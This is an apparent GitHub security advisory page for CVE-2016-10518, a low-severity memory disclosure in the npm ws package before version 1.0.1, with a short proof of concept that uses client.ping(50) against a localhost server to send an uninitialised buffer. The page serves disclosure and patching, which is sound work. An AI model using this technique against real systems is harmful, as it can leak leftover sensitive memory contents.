Skip to content

Remote Memory Disclosure in ws

Low severity GitHub Reviewed Published Feb 18, 2019 to the GitHub Advisory Database • Updated Sep 18, 2023

Package

npm ws (npm)

Affected versions

< 1.0.1

Patched versions

1.0.1

Description

Versions of ws prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a client.ping() call will cause ws to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

Proof of Concept

var ws = require('ws')

var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client. 
  })
})

Recommendation

Update to version 1.0.1 or greater.

References

Published to the GitHub Advisory Database Feb 18, 2019
Reviewed Jun 16, 2020
Last updated Sep 18, 2023

Severity

Low

EPSS score

0.154%
(52nd percentile)

Weaknesses

CVE ID

CVE-2016-10518

GHSA ID

GHSA-2mhh-w6q8-5hxw

Source code

No known source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.